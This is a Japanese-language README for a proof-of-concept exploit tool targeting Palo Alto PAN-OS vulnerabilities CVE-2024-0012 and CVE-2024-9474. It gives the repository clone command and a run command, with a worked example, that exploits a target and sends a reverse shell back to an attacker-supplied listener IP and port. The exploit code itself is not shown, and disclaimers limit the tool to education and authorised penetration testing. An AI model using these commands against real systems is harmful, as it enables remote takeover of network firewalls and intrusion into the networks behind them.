
このPoCは、Palo Alto PAN-OSの脆弱性、具体的にはCVE-2024-0012およびCVE-2024-9474を対象としています。このスクリプトは、ペイロードの作成、チャンク転送、シームレスなコマンド実行を含む、エクスプロイトプロセスを自動化します。
このProof-of-Concept(PoC)スクリプトは、Palo Alto PAN-OSの脆弱性、具体的には CVE-2024-0012 と CVE-2024-9474 を標的とし、認証バイパス、ペイロード生成、チャンク配信、シームレスなコマンド実行を含むエクスプロイトプロセスを自動化します。
⚠️ このスクリプトは教育目的および許可されたペネトレーションテスト専用です。不正使用は違法です。
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
<TARGET_URL>: http または https を含むターゲットURL。<LISTENER_IP>: リバースシェルリスナーのIPアドレス。<LISTENER_PORT>: リバースシェルリスナーのポート。python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5
このPoCの詳細な解説と技術的洞察については、こちらの Mediumの解説記事 をご覧ください!
このPoCは、教育目的および許可されたセキュリティテスト専用です。このツールの不正使用は固く禁止されています。著者は、このツールの誤用または損害について一切の責任を負いません。